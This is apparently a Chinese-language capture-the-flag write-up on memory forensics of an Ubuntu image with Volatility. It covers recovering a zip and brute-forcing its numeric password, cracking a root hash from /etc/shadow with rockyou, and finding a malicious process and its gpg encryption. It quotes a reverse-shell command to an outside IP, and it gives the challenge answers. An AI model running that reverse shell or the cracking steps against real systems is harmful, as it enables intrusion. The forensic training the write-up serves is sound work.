我们先把linux取证文件放到kali中，然后这里的Ubuntu18.04-5.4.0-84-generic.zip需要不解压直接放到vol工具中

然后把Ubuntu18.04-5.4.0-84-generic放到vol工具中，然后开始去这个，使用vol工具查看linux的版本信息

这个LinuxUbuntu18_04-5_4_0-84-genericx64是有用的，是linux的版本信息，复制出来需要用

请提交⽤户⽬录下压缩包中的 flag.txt ⽂件内容

使用这个命令来提取出来linux中的文件信息

使用命令查看flag，有一个flag.zip，我们来下载下来，查看参数是-i和-o

然后解压flag.zip,需要解压密码，我们用图形化界面打开，看到一个提示

说是密码是8位的数字，我们就生成一个密码字典，然后进行爆破

生成密码字典

爆破，先把flag.zip给弄成一个hash，然后进行爆破，密码是20230309

解压得到flag

请提交 root 账户的登录密码

root的账户密码是存在于/etc/shadow的，我们需要提取这个文件的内容，然后进行爆破，既然是 文件，我们可以看我们提取出俩的file，过滤出来/etc/shadow的索引，然后提取

提取命令和上一步差不多

复制下来admin的加密hash，然后使用rockyou.txt进行爆破

爆破出来root的密码是ABCabc123

请指出攻击者通过什么命令实现提权操作

这里要知道攻击者使用啥命令进行提权，需要知道它运行了哪些命令，我们可以使用bash插件来看她的历史命令，排查

如下就是一个反弹shell的命令，所以判定这个就是提权的操作

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.29.129/7777 0>&1 \;

除此之外，还发现了

请指出内存中恶意进程的的PID flag{2132}

通过使用pslist插件来查进程，排查发现一个powershell,这个就是恶意程序的进程了，它的pid是2132

请指出恶意进程文件加密后的文件类型(如果是 1.zip 就填 zip)

这里我们利用psaux插件来查看，然后恶意也可以直接把恶意进程down下来看 1.使用psaux插件看

然后在最后可以看到一个输出为gpg的加密内容，是加密了wlaq.txt这个文件

2.在下载的文件中，找powershell，然后dump下来看内容，看到加密的类型是gpg，然后有一个邮箱

可以判断出来解密的文件类型是gpg